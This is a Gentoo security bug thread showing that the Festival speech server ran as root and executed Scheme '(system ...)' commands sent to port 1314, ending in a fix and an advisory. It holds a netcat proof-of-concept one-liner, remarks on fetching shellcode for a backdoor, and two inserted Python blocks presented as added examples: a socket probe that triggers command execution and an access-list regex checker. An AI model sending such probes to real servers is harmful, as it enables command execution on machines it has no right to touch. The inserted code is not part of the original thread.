Summary: | app-accessibility/festival: privilege elevation with current default setup | ||
---|---|---|---|
Product: | Gentoo Security | Reporter: | Eugene Medvedev <rn3aoh.g> |
Component: | Default Configs | Assignee: | Gentoo Security <security> |
Status: | RESOLVED FIXED | ||
Severity: | major | CC: | accessibility, brebs, ia64, philantrop, solar, sound, williamh |
Priority: | High | ||
Version: | unspecified | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | B1 [glsa] Falco | ||
Package list: | Runtime testing required: | --- | |
Attachments:
festival-bug-170477.diff (attachment 121219)
festival-bug-170477.diff (attachment 121309)
festival-1.95_beta-r3.ebuild (attachment 121494)
festival.rc (attachment 121496)
server.scm (attachment 121497)
Description
Eugene Medvedev
2007-03-11 20:10:03 UTC
thanks for your report. CCing maintainer

adding herds please comment/fix, since jeeves has not seen williamh for 20 days

Herds please advise and provide an updated ebuild as necessary.

Herds please advise.

Herds/Maintainer please advise

Herds please advise.

Herds please advise.

hurry up or mask

Created attachment 121219 [details, diff]
festival-bug-170477.diff
How about something like this? Run it as its own user and set its shell to /bin/false.
solar@here $ echo '(system "whoami > /tmp/amiroot")' | busybox nc localhost 1314
LP
nil
ft_StUfF_keyOK
solar@here $ cat /tmp/amiroot
festival
I don't know if the 'system' command can/should/could be disabled altogether or if there is a better alternative, but this meets the initial poster's suggestion.
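The transcript above is the whole test case: send a Scheme form to the server port, let `(system ...)` write a marker, and look at who wrote it. The arch testers later report "no security hole with test case" after doing the same thing by hand. The following Python is an added example, not code from this bug or from Festival, that builds the same probe and parses the reply so the outcome can be asserted rather than eyeballed. It assumes, from the transcript only, that the server answers with a line `LP`, the printed result, and then the literal sentinel `ft_StUfF_key` followed by `OK` (or `ER`), and that client and server share the host so the marker file can be read locally. The port 1314 and the marker path are the ones used in the transcript.

```python
"""Probe a Festival server for (system ...) execution and report the account it runs as.

Added example for this bug; the wire format below is inferred from the transcript
in the bug (LP / result / ft_StUfF_keyOK), not taken from Festival documentation.
"""
import os
import socket
import tempfile

FESTIVAL_PORT = 1314          # port used in the transcript
SENTINEL = b"ft_StUfF_key"    # end-of-result marker observed in the transcript


def scheme_string(s: str) -> str:
    """Quote s as a Scheme string literal so it cannot escape the (system "...") form."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'


def build_system_probe(marker_path: str) -> bytes:
    """Scheme form that makes the server record the user it runs as into marker_path."""
    return ("(system " + scheme_string("whoami > " + marker_path) + ")\n").encode()


def parse_reply(raw: bytes):
    """Split a server reply into (payload, status).

    status is "OK", "ER", or None if the sentinel never arrived; payload is None
    if the reply did not start with the expected "LP" line.
    """
    if not raw.startswith(b"LP\n"):
        return None, None
    body = raw[len(b"LP\n"):]
    idx = body.find(SENTINEL)
    if idx < 0:
        return body.decode(errors="replace"), None
    payload = body[:idx].decode(errors="replace").strip()
    end = idx + len(SENTINEL)
    status = body[end:end + 2].decode(errors="replace")
    return payload, status


def classify_owner(owner: str) -> str:
    """Turn the marker's content into a verdict: root means the bug is present."""
    if owner == "root":
        return "VULNERABLE: festival executes (system ...) as root"
    return "ok: festival runs (system ...) as unprivileged user %r" % owner


def send_probe(marker_path: str, host: str = "127.0.0.1",
               port: int = FESTIVAL_PORT, timeout: float = 5.0):
    """Send the probe to a live server and return (payload, status). Not used offline."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_system_probe(marker_path))
        buf = b""
        # Read until the sentinel and its two-byte status have arrived.
        while SENTINEL not in buf or len(buf) < buf.find(SENTINEL) + len(SENTINEL) + 2:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
    return parse_reply(buf)


if __name__ == "__main__":
    # Use a fresh world-writable directory so the server user can create the marker
    # without a pre-existing file an attacker could have planted in /tmp.
    workdir = tempfile.mkdtemp(prefix="festival-probe-")
    os.chmod(workdir, 0o1777)
    marker = os.path.join(workdir, "amiroot")
    payload, status = send_probe(marker)
    print("server replied:", payload, status)
    with open(marker) as fh:
        print(classify_owner(fh.read().strip()))
```

Run it against a server started the old way (as root) and then against the patched init script; the verdict line is the check the arch testers describe. The marker is created in a fresh sticky directory rather than directly in /tmp so that a root-running server is not tricked into following a symlink someone else placed at a predictable name.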
(In reply to comment #9)
> I don't know if the 'system' command can/should/could be disabled all together
> or if there is a better alternative but this meets the initial
> posters suggestion.

It shouldn't be disabled altogether because festival extensively uses it internally (for example, it is required to use mbrola voices). Also, I think I've seen several code examples which involve using it from the client to play the speech festival generates, so you probably can't prevent the client from using it without breaking stuff. But it definitely doesn't have to be root. :)

Adding the festival user to the audio group in the ebuild would be a good idea, by the way.

(In reply to comment #9)
> Created an attachment (id=121219) [edit]
> festival-bug-170477.diff
>
> How about something like this? Run it as it's own user and set it's shell to
> /bin/false.

It still doesn't stop one from wgetting, building, running shellcode which opens a backdoor to experiment with local exploits to gain root privileges..

> It still doesn't stop one for wgetting, building, running shellcode which opens
> backdoor to experiment with local exploits to gain root privileges..

Considering that connections are only allowed from localhost in the default configuration, you have to be a local user already to do that, or am I missing something?
(In reply to comment #10)
> Adding the festival user to the audio group in the ebuild would be a good idea,
> by the way.

Can you please attach an updated diff.

cvs -d :pserver:anonymous@anoncvs.gentoo.org:/var/cvsroot \
    co gentoo-x86/app-accessibility/festival
...
cvs diff -u > foo.diff

> Can you please attach an updated diff.

If I knew enough portage, I'd post a diff with that instead of just a bug report in the first place. :)
Oh, almost forgot, just noticed this. The server.scm configuration file that comes with the ebuild actually contains:

; Server access list (hosts)
(set! server_access_list '("[^.]+" "127.0.0.1" "localhost.*" "192.168.*"))

If 192.168.* is allowed, and you can (system "<whatever>") from a different machine, the argument about using festival to try local exploits still stands. Maybe adding a warning to set a server password if you plan to connect to festival remotely is also in order.

(In reply to comment #15)
> Oh, almost forgot, just noticed this. The server.scm configuration file that
> comes with the ebuild actually contains:
>
> ; Server access list (hosts)
> (set! server_access_list '("[^.]+" "127.0.0.1" "localhost.*" "192.168.*"))

Question: Would that regexp currently allow remote exec of the "system" command with a domain such as localhost.is.a.myth.gentoo.org ?

Created attachment 121309 [details, diff]
festival-bug-170477.diff
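The question about `localhost.is.a.myth.gentoo.org` is never answered in the thread. The Python below is an added example, not Festival's code, that evaluates the shipped `server_access_list` against candidate client names the way a reviewer would. It assumes Festival treats each entry as a regular expression that must match the whole reverse-resolved client name or address string (the `"[^.]+"` entry, meant for unqualified local names, only makes sense under whole-string matching); if the real check is an unanchored search, the list is more permissive than shown, not less. `HARDENED_ACCESS_LIST` is a suggested replacement, not something from the ebuild.

```python
"""Evaluate Festival-style server_access_list patterns against client names.

Added example for this bug. DEFAULT_ACCESS_LIST is copied from the server.scm
quoted in the bug; whole-string matching is an assumption about Festival.
"""
import re

# Exactly the entries from the ebuild's server.scm quoted above.
DEFAULT_ACCESS_LIST = ["[^.]+", "127.0.0.1", "localhost.*", "192.168.*"]

# A tighter list (assumption, not from the ebuild): literal dots escaped, no
# trailing wildcard, so only the loopback name and address get through.
HARDENED_ACCESS_LIST = ["localhost", r"127\.0\.0\.1"]


def first_match(client_name: str, access_list):
    """Return the first entry that matches the whole client name, or None."""
    for pattern in access_list:
        if re.fullmatch(pattern, client_name):
            return pattern
    return None


def host_allowed(client_name: str, access_list) -> bool:
    return first_match(client_name, access_list) is not None


def report(client_names, access_list):
    """Map each client name to the entry that admits it (None = rejected)."""
    return {name: first_match(name, access_list) for name in client_names}


if __name__ == "__main__":
    # Constructed client names, chosen to exercise each weak spot in the list.
    candidates = [
        "localhost",                         # intended
        "127.0.0.1",                         # intended
        "localhost.is.a.myth.gentoo.org",    # the name asked about in the bug
        "192.168.1.50",                      # any host on a private /16
        "192x168.example.com",               # unescaped dots match any character
        "evil",                              # any unqualified name matches "[^.]+"
    ]
    for label, acl in (("shipped", DEFAULT_ACCESS_LIST), ("hardened", HARDENED_ACCESS_LIST)):
        print(label)
        for name, pattern in report(candidates, acl).items():
            print("  %-35s %s" % (name, "rejected" if pattern is None else "allowed by %r" % pattern))
```

Under the shipped list every candidate is admitted: `localhost.*` takes the gentoo.org name because `.*` is an unanchored tail, `192.168.*` takes `192x168.example.com` because the dots are unescaped, and `[^.]+` takes anything without a dot. The hardened list rejects all but the two loopback entries. Note also that a remote client's reverse name is set by whoever controls the PTR zone for its address, so hostname patterns are access hygiene, not authentication; that is why the comment above suggests a server password for any remote use.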
That patch sounds good to me even though it is only a poor workaround. Sound herd: does someone want to commit it into the tree, or can we commit it ourselves?

I am looking at committing this tonight or tomorrow. Thanks.

I have found one issue with this patch so far. The festival server can create a log, and by default that goes to /var/log/festival.log. That does not work if festival is running as a user other than root since /var/log is read-only to any other user. Any suggestions?

(In reply to comment #20)
> I have found one issue with this patch so far. The festival server can create
> a log, and by default that goes to /var/log/festival.log. That does not work
> if festival is running as a user other than root since /var/log is read-only to
> any other user. Any suggestions?

Things like apache, clamav, lighttpd, mysql, snort and squid all use a subdir in /var/log/ that is owned by that user. So you want /var/log/festival/festival.log

Created attachment 121494 [details]
festival-1.95_beta-r3.ebuild
Fixes /var/log/festival/ and enewuser. Big cleanup. Not using a diff because it would be larger than the file.
Created attachment 121496 [details]
festival.rc
Runs as "festival" user.
Created attachment 121497 [details]
server.scm
Sets logfile location.
The fix for this has been committed to the tree. I'm not sure whether I can close this or if I should wait for the security team to check it. Please advise.

Thx William, now it's time for arches. Arches please test and mark stable. Target keywords are:

festival-1.95_beta-r4.ebuild:KEYWORDS="alpha amd64 hppa ia64 ppc ppc64 sparc x86"

app-accessibility/festival-1.95_beta-r4 USE="X asterisk -esd -mbrola"
1. emerges on x86
2. passes collision test
3. app-accessibility/gnome-speech-0.4.11 emerges with it
4. works

    Portage 2.1.2.7 (default-linux/x86/2007.0/desktop, gcc-4.1.2, glibc-2.5-r3, 2.6.20.12 i686)
    =================================================================
    System uname: 2.6.20.12 i686 Genuine Intel(R) CPU T2300 @ 1.66GHz
    Gentoo Base System release 1.12.9
    Timestamp of tree: Sat, 09 Jun 2007 09:00:01 +0000
    dev-java/java-config: 1.3.7, 2.0.32
    dev-lang/python: 2.3.5-r3, 2.4.4-r4
    dev-python/pycrypto: 2.0.1-r5
    sys-apps/sandbox: 1.2.17
    sys-devel/autoconf: 2.13, 2.61
    sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10
    sys-devel/binutils: 2.16.1-r3
    sys-devel/gcc-config: 1.3.16
    sys-devel/libtool: 1.5.22
    virtual/os-headers: 2.6.17-r2
    ACCEPT_KEYWORDS="x86"
    AUTOCLEAN="yes"
    CBUILD="i686-pc-linux-gnu"
    CFLAGS="-O2 -march=prescott -pipe -fomit-frame-pointer"
    CHOST="i686-pc-linux-gnu"
    CONFIG_PROTECT="/etc /usr/kde/3.5/env /usr/kde/3.5/share/config /usr/kde/3.5/shutdown /usr/share/X11/xkb /usr/share/config"
    CONFIG_PROTECT_MASK="/etc/env.d /etc/env.d/java/ /etc/gconf /etc/php/apache2-php5/ext-active/ /etc/php/cgi-php5/ext-active/ /etc/php/cli-php5/ext-active/ /etc/revdep-rebuild /etc/terminfo /etc/texmf/web2c"
    CXXFLAGS="-O2 -march=prescott -pipe -fomit-frame-pointer"
    DISTDIR="/usr/portage/distfiles"
    EMERGE_DEFAULT_OPTS="--nospinner"
    FEATURES="collision-protect distlocks metadata-transfer parallel-fetch sandbox sfperms strict test userfetch userpriv usersandbox"
    GENTOO_MIRRORS="http://mirror.switch.ch/mirror/gentoo/ http://gentoo.inode.at/"
    LINGUAS="en de en_GB de_CH"
    MAKEOPTS="-j3"
    PKGDIR="/usr/portage/packages"
    PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress --force --whole-file --delete --delete-after --stats --timeout=180 --exclude=/distfiles --exclude=/local --exclude=/packages --filter=H_**/files/digest-*"
    PORTAGE_TMPDIR="/var/tmp"
    PORTDIR="/usr/portage"
    SYNC="rsync://rsync.gentoo.org/gentoo-portage"
    USE="X a52 aac acl acpi alsa apache2 asf avahi berkdb bitmap-fonts cairo cdr cdrom cli cracklib crypt cups dbus divx dri dts dvd dvdr dvdread eds emboss encode evo fam ffmpeg firefox flac fortran gdbm gif gnome gpm gstreamer gtk hal iconv ipv6 isdnlog java jpeg kde kdeenablefinal kerberos ldap libg++ mad midi mikmod mmx mono mp3 mpeg mudflap ncurses nls nptl nptlonly ogg opengl openmp oss pam pcre pdf perl png pppd python qt3 qt3support qt4 quicktime readline reflection rtsp ruby samba sdl session smp spell spl sse sse2 sse3 ssl svg tcpd test tetex theora threads tiff truetype truetype-fonts type1-fonts unicode vcd vorbis wifi win32codecs wxwindows x264 x86 xine xml xorg xprint xv xvid zlib" ELIBC="glibc" INPUT_DEVICES="keyboard mouse" KERNEL="linux" LINGUAS="en de en_GB de_CH" USERLAND="GNU" VIDEO_CARDS="i810 fbdev vesa"
    Unset: CTARGET, INSTALL_MASK, LANG, LC_ALL, LDFLAGS, PORTAGE_COMPRESS, PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS, PORTDIR_OVERLAY

ppc stable

Stable for HPPA.

ppc64 stable

Testing festival-1.95_beta-r4
1. Emerges fine
2. Passes collision
3. Works fine
4. no security hole with test case

$ emerge --info

    Portage 2.1.2.7 (default-linux/alpha/2007.0, gcc-4.1.2, glibc-2.5-r2, 2.6.21-gentoo-r1 alpha)
    =================================================================
    System uname: 2.6.21-gentoo-r1 alpha EV56
    Gentoo Base System release 1.12.9
    Timestamp of tree: Sat, 09 Jun 2007 14:20:01 +0000
    distcc 2.18.3 alpha-unknown-linux-gnu (protocols 1 and 2) (default port 3632) [enabled]
    ccache version 2.4 [enabled]
    dev-lang/python: 2.4.4-r4
    dev-python/pycrypto: 2.0.1-r5
    dev-util/ccache: 2.4-r7
    sys-apps/sandbox: 1.2.18.1
    sys-devel/autoconf: 2.13, 2.61
    sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10
    sys-devel/binutils: 2.17.50.0.16
    sys-devel/gcc-config: 1.3.15-r1
    sys-devel/libtool: 1.5.22
    virtual/os-headers: 2.6.17-r2
    ACCEPT_KEYWORDS="alpha"
    AUTOCLEAN="yes"
    CBUILD="alpha-unknown-linux-gnu"
    CFLAGS="-mieee -pipe -O2 -mcpu=ev56"
    CHOST="alpha-unknown-linux-gnu"
    CONFIG_PROTECT="/etc /usr/share/X11/xkb /var/bind"
    CONFIG_PROTECT_MASK="/etc/env.d /etc/gconf /etc/revdep-rebuild /etc/splash /etc/terminfo"
    CXXFLAGS="-mieee -pipe -O2 -mcpu=ev56"
    DISTDIR="/usr/portage/distfiles"
    FEATURES="ccache collision-protect distcc distlocks metadata-transfer parallel-fetch sandbox sfperms strict test"
    GENTOO_MIRRORS="http://distfiles.gentoo.org http://distro.ibiblio.org/pub/linux/distributions/gentoo"
    LINGUAS="en"
    MAKEOPTS="-j3"
    PKGDIR="/usr/portage/packages"
    PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress --force --whole-file --delete --delete-after --stats --timeout=180 --exclude=/distfiles --exclude=/local --exclude=/packages --filter=H_**/files/digest-*"
    PORTAGE_TMPDIR="/var/tmp"
    PORTDIR="/usr/portage"
    PORTDIR_OVERLAY="/usr/portage/local/overlay"
    SYNC="rsync://eldest/gentoo-portage"
    USE="X acl alpha alsa berkdb bitmap-fonts bzip2 cli cracklib crypt cups curl dri fortran gdbm gpm iconv ipv6 isdnlog ldap libg++ logrotate midi mudflap ncurses nls nptl nptlonly openmp pam pcre perl postfix pppd python readline reflection session spl sqlite ssl startup-notification tcpd test truetype-fonts type1-fonts unicode xorg zlib" ALSA_CARDS="au8810" ALSA_PCM_PLUGINS="adpcm alaw asym copy dmix dshare dsnoop empty extplug file hooks iec958 ioplug ladspa lfloat linear meter mulaw multi null plug rate route share shm softvol" ELIBC="glibc" INPUT_DEVICES="evdev keyboard mouse joystick" KERNEL="linux" LCD_DEVICES="bayrad cfontz cfontz633 glk hd44780 lb216 lcdm001 mtxorb ncurses text" LINGUAS="en" USERLAND="GNU" VIDEO_CARDS="vga s3virge nv cirrus"
    Unset: CTARGET, EMERGE_DEFAULT_OPTS, INSTALL_MASK, LANG, LC_ALL, LDFLAGS, PORTAGE_COMPRESS, PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS

stable on alpha. Brian++

Marked stable on amd64.

x86 stable, thanks Markus.

sparc stable.

ia64 is there something wrong with stabilization?

ia64 is not security supported :) Plus I can't test it

err, indeed :)

it's GLSA 200707-10, thanks